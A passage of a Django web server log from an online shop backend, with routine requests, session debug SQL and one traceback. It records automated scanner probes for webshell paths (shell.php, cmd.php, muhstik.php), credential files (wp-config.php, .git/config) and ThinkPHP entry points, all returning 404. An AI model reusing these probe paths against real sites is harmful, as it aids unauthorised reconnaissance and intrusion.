'9xhuxfv14ewtc3z5l0z54ulc4noibvs0' LIMIT 1; args=('9xhuxfv14ewtc3z5l0z54ulc4noibvs0',) DEBUG 2019-12-20 14:10:07,090 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9xhuxfv14ewtc3z5l0z54ulc4noibvs0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T14:10:07.089308+00:00'::timestamptz); args=('9xhuxfv14ewtc3z5l0z54ulc4noibvs0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 14, 10, 7, 89308, tzinfo=)) [20/Dec/2019 14:10:07] "GET /login/?next=%2F HTTP/1.0" 200 1788 Not Found: /sitemap.xml [20/Dec/2019 14:10:07] "GET /sitemap.xml HTTP/1.0" 404 6454 [20/Dec/2019 14:18:26] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:19:34] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:23:29] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:28:31] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 14:35:34] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:40:37] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:45:39] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:53:52] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:00:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:02:50] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:08:19] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:12:54] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 15:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 15:25:13] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:27:30] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 15:31:41] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:36:43] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [20/Dec/2019 15:37:45] "POST /editBlackAndWhiteList HTTP/1.0" 500 63913 [20/Dec/2019 15:41:46] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 15:50:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 15:55:46] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:19:15] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:24:18] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:29:20] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:34:23] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:39:26] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:44:28] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:51:56] "GET / HTTP/1.0" 302 0 [20/Dec/2019 16:56:59] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:13:38] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:18:41] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 17:24:28] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:29:31] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:34:58] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:37:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:42:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:47:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:52:13] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:53:47] "GET / HTTP/1.0" 302 0 [20/Dec/2019 17:57:16] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:12:39] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:17:42] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:26:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:31:04] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:36:07] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:43:29] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:48:32] "GET / HTTP/1.0" 302 0 [20/Dec/2019 18:56:28] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:05:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:13:19] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:17:23] "OPTIONS / HTTP/1.0" 302 0 [20/Dec/2019 19:23:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:30:25] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:36:49] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:41:52] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:51:15] "GET / HTTP/1.0" 302 0 [20/Dec/2019 19:58:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:07:53] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 20:08:51] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [20/Dec/2019 20:09:12] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=185 HTTP/1.0" 404 6532 Not Found: /newslist.asp [20/Dec/2019 20:09:22] "GET /newslist.asp?type=4&id=1334 HTTP/1.0" 404 6476 [20/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:17:34] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:25:14] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:33:29] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:40:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:45:12] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:48:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 20:49:00,198 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rv13cmxfjiga7q2vszy4pqvii5l3ybly' LIMIT 1; args=('rv13cmxfjiga7q2vszy4pqvii5l3ybly',) DEBUG 2019-12-20 20:49:00,200 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rv13cmxfjiga7q2vszy4pqvii5l3ybly', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T20:49:00.198861+00:00'::timestamptz); args=('rv13cmxfjiga7q2vszy4pqvii5l3ybly', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 20, 49, 0, 198861, tzinfo=)) [20/Dec/2019 20:49:00] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 20:50:14] "GET / HTTP/1.0" 302 0 [20/Dec/2019 20:58:29] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:10:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:26:48] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:31:51] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:39:56] "GET / HTTP/1.0" 302 0 Not Found: /.git/config [20/Dec/2019 21:41:51] "GET /.git/config HTTP/1.0" 404 6453 [20/Dec/2019 21:44:58] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:50:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 21:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 21:56:45] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:25:14] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:28:25] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:30:16] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:35:19] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:40:52] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:41:26] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:46:28] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 22:51:44] "GET / HTTP/1.0" 302 0 [20/Dec/2019 22:59:17] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:18:29] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:23:32] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:28:34] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:33:37] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:38:39] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:43:42] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 23:45:14] "GET /robots.txt HTTP/1.0" 404 6451 [20/Dec/2019 23:45:18] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:48:44] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:53:47] "GET / HTTP/1.0" 302 0 [20/Dec/2019 23:58:50] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [20/Dec/2019 23:59:12] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [20/Dec/2019 23:59:12] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [20/Dec/2019 23:59:14] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [20/Dec/2019 23:59:14] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [20/Dec/2019 23:59:16] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [20/Dec/2019 23:59:17] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [20/Dec/2019 23:59:17] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [20/Dec/2019 23:59:18] "GET /index.php HTTP/1.0" 404 6447 [20/Dec/2019 23:59:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 23:59:19,583 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nceqwl2slj3lq2db1g1mp5d2t2ylnsa6' LIMIT 1; args=('nceqwl2slj3lq2db1g1mp5d2t2ylnsa6',) DEBUG 2019-12-20 23:59:19,587 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nceqwl2slj3lq2db1g1mp5d2t2ylnsa6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T23:59:19.584516+00:00'::timestamptz); args=('nceqwl2slj3lq2db1g1mp5d2t2ylnsa6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 23, 59, 19, 584516, tzinfo=)) [20/Dec/2019 23:59:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 00:03:57] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:05:40] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:10:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:25:21] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [21/Dec/2019 00:27:03] "GET /proxy.php HTTP/1.0" 404 6454 Not Found: /proxy.php [21/Dec/2019 00:27:26] "GET /proxy.php HTTP/1.0" 404 6454 [21/Dec/2019 00:30:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:35:51] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:40:54] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:45:57] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [21/Dec/2019 00:45:58] "GET /proxy.php HTTP/1.0" 404 6454 [21/Dec/2019 00:52:43] "GET / HTTP/1.0" 302 0 [21/Dec/2019 00:57:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:16:27] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:21:30] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:29:53] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:34:55] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:39:58] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 01:45:01] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:50:04] "GET / HTTP/1.0" 302 0 [21/Dec/2019 01:57:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:02:20] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:10:04] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:14:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:20:00] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:21:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:25:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:36:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:46:20] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:51:22] "GET / HTTP/1.0" 302 0 [21/Dec/2019 02:56:25] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:17:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 03:17:42,470 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'x0zpoxp9sohu7kykf2mvhhysszapomh2' LIMIT 1; args=('x0zpoxp9sohu7kykf2mvhhysszapomh2',) DEBUG 2019-12-21 03:17:42,473 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('x0zpoxp9sohu7kykf2mvhhysszapomh2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T03:17:42.471182+00:00'::timestamptz); args=('x0zpoxp9sohu7kykf2mvhhysszapomh2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 3, 17, 42, 471182, tzinfo=)) [21/Dec/2019 03:17:42] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /ip4.php [21/Dec/2019 03:17:42] "GET /ip4.php HTTP/1.0" 404 6445 [21/Dec/2019 03:17:43] "GET /search?q=lenovo HTTP/1.0" 301 0 DEBUG 2019-12-21 03:17:43,225 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'search'; args=('search',) Not Found: /search/ [21/Dec/2019 03:17:43] "GET /search/?q=lenovo HTTP/1.0" 404 1740 Not Found: /ipcheck/70.32.81.181 [21/Dec/2019 03:17:43] "GET /ipcheck/70.32.81.181 HTTP/1.0" 404 6489 Not Found: /start/user [21/Dec/2019 03:17:43] "GET /start/user HTTP/1.0" 404 6451 Not Found: /judge.php [21/Dec/2019 03:17:44] "GET /judge.php HTTP/1.0" 404 6448 [21/Dec/2019 03:20:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:25:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:30:16] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:38:26] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:38:54] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:43:56] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:50:19] "GET / HTTP/1.0" 302 0 [21/Dec/2019 03:58:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:04:37] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:10:04] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:15:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:20:09] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:25:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:34:29] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:39:32] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:44:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:49:37] "GET / HTTP/1.0" 302 0 [21/Dec/2019 04:54:40] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [21/Dec/2019 04:55:37] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [21/Dec/2019 04:56:08] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=186 HTTP/1.0" 404 6532 Not Found: /newslist.asp [21/Dec/2019 04:57:14] "GET /newslist.asp?type=4&id=1272 HTTP/1.0" 404 6476 [21/Dec/2019 05:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 05:00:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:20:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:25:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:35:12] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:40:14] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:45:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /proxy.php [21/Dec/2019 05:47:43] "GET /proxy.php HTTP/1.0" 404 6454 [21/Dec/2019 05:49:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 05:54:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:00:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:17:55] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:22:58] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:25:28] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:28:00] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:33:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 06:33:05,468 utils 4252 140031503103744 (0.007) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3d3npoe3wz2uw5vlf7kdtugn04zj6vjz' LIMIT 1; args=('3d3npoe3wz2uw5vlf7kdtugn04zj6vjz',) DEBUG 2019-12-21 06:33:05,472 utils 4252 140031503103744 (0.003) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3d3npoe3wz2uw5vlf7kdtugn04zj6vjz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T06:33:05.469049+00:00'::timestamptz); args=('3d3npoe3wz2uw5vlf7kdtugn04zj6vjz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 6, 33, 5, 469049, tzinfo=)) [21/Dec/2019 06:33:05] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 06:33:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 06:33:05,899 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cusvjitgnzbj6kvvq67tt6i702bg54ol' LIMIT 1; args=('cusvjitgnzbj6kvvq67tt6i702bg54ol',) DEBUG 2019-12-21 06:33:05,901 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cusvjitgnzbj6kvvq67tt6i702bg54ol', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T06:33:05.900162+00:00'::timestamptz); args=('cusvjitgnzbj6kvvq67tt6i702bg54ol', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 6, 33, 5, 900162, tzinfo=)) [21/Dec/2019 06:33:05] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 06:35:58] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:41:37] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:46:40] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:48:10] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:51:42] "GET / HTTP/1.0" 302 0 [21/Dec/2019 06:51:48] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [21/Dec/2019 06:51:51] "GET /robots.txt HTTP/1.0" 404 6450 [21/Dec/2019 06:52:14] "GET / HTTP/1.0" 302 0 Not Found: /l.php [21/Dec/2019 06:52:14] "GET /l.php HTTP/1.0" 404 6435 Not Found: /phpinfo.php [21/Dec/2019 06:52:16] "GET /phpinfo.php HTTP/1.0" 404 6453 Not Found: /test.php [21/Dec/2019 06:52:17] "GET /test.php HTTP/1.0" 404 6444 Not Found: /index.php [21/Dec/2019 06:52:17] "POST /index.php HTTP/1.0" 404 6448 Not Found: /bbs.php [21/Dec/2019 06:52:20] "POST /bbs.php HTTP/1.0" 404 6442 Not Found: /forum.php [21/Dec/2019 06:52:20] "POST /forum.php HTTP/1.0" 404 6448 Not Found: /forums.php [21/Dec/2019 06:52:22] "POST /forums.php HTTP/1.0" 404 6451 Not Found: /bbs/index.php [21/Dec/2019 06:52:26] "POST /bbs/index.php HTTP/1.0" 404 6460 Not Found: /forum/index.php [21/Dec/2019 06:52:28] "POST /forum/index.php HTTP/1.0" 404 6466 Not Found: /forums/index.php [21/Dec/2019 06:52:29] "POST /forums/index.php HTTP/1.0" 404 6469 DEBUG 2019-12-21 06:52:31,540 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [21/Dec/2019 06:52:31] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [21/Dec/2019 06:52:33] "GET /help.php HTTP/1.0" 404 6444 Not Found: /java.php [21/Dec/2019 06:52:34] "GET /java.php HTTP/1.0" 404 6444 Not Found: /test.php [21/Dec/2019 06:52:38] "GET /test.php HTTP/1.0" 404 6444 Not Found: /db_cts.php [21/Dec/2019 06:52:39] "GET /db_cts.php HTTP/1.0" 404 6450 Not Found: /db_pma.php [21/Dec/2019 06:52:39] "GET /db_pma.php HTTP/1.0" 404 6450 Not Found: /logon.php [21/Dec/2019 06:52:40] "GET /logon.php HTTP/1.0" 404 6447 Not Found: /help-e.php [21/Dec/2019 06:52:42] "GET /help-e.php HTTP/1.0" 404 6450 Not Found: /license.php [21/Dec/2019 06:52:43] "GET /license.php HTTP/1.0" 404 6453 Not Found: /log.php [21/Dec/2019 06:52:44] "GET /log.php HTTP/1.0" 404 6441 Not Found: /hell.php [21/Dec/2019 06:52:46] "GET /hell.php HTTP/1.0" 404 6444 Not Found: /pmd_online.php [21/Dec/2019 06:52:47] "GET /pmd_online.php HTTP/1.0" 404 6462 Not Found: /shell.php [21/Dec/2019 06:52:51] "GET /shell.php HTTP/1.0" 404 6447 Not Found: /htdocs.php [21/Dec/2019 06:52:53] "GET /htdocs.php HTTP/1.0" 404 6450 Not Found: /b.php [21/Dec/2019 06:52:53] "GET /b.php HTTP/1.0" 404 6435 Not Found: /sane.php [21/Dec/2019 06:52:55] "GET /sane.php HTTP/1.0" 404 6444 Not Found: /desktop.ini.php [21/Dec/2019 06:52:56] "GET /desktop.ini.php HTTP/1.0" 404 6465 Not Found: /z.php [21/Dec/2019 06:52:57] "GET /z.php HTTP/1.0" 404 6435 Not Found: /lala.php [21/Dec/2019 06:52:59] "GET /lala.php HTTP/1.0" 404 6444 Not Found: /wpc.php [21/Dec/2019 06:53:03] "GET /wpc.php HTTP/1.0" 404 6441 Not Found: /wpo.php [21/Dec/2019 06:53:04] "GET /wpo.php HTTP/1.0" 404 6441 Not Found: /t6nv.php [21/Dec/2019 06:53:04] "GET /t6nv.php HTTP/1.0" 404 6444 Not Found: /muhstik.php [21/Dec/2019 06:53:06] "GET /muhstik.php HTTP/1.0" 404 6453 Not Found: /text.php [21/Dec/2019 06:53:07] "GET /text.php HTTP/1.0" 404 6444 Not Found: /wp-config.php [21/Dec/2019 06:53:08] "GET /wp-config.php HTTP/1.0" 404 6459 Not Found: /muhstik.php [21/Dec/2019 06:53:08] "GET /muhstik.php HTTP/1.0" 404 6453 Not Found: /muhstik2.php [21/Dec/2019 06:53:09] "GET /muhstik2.php HTTP/1.0" 404 6456 Not Found: /muhstiks.php [21/Dec/2019 06:53:11] "GET /muhstiks.php HTTP/1.0" 404 6456 Not Found: /muhstik-dpr.php [21/Dec/2019 06:53:12] "GET /muhstik-dpr.php HTTP/1.0" 404 6465 Not Found: /lol.php [21/Dec/2019 06:53:12] "GET /lol.php HTTP/1.0" 404 6441 Not Found: /uploader.php [21/Dec/2019 06:53:16] "GET /uploader.php HTTP/1.0" 404 6456 Not Found: /cmd.php [21/Dec/2019 06:53:16] "GET /cmd.php HTTP/1.0" 404 6441 Not Found: /cmv.php [21/Dec/2019 06:53:19] "GET /cmv.php HTTP/1.0" 404 6441 Not Found: /cmdd.php [21/Dec/2019 06:53:20] "GET /cmdd.php HTTP/1.0" 404 6444 Not Found: /knal.php [21/Dec/2019 06:53:21] "GET /knal.php HTTP/1.0" 404 6444 Not Found: /cmd.php [21/Dec/2019 06:53:22] "GET /cmd.php HTTP/1.0" 404 6441 Not Found: /shell.php [21/Dec/2019 06:53:23] "GET 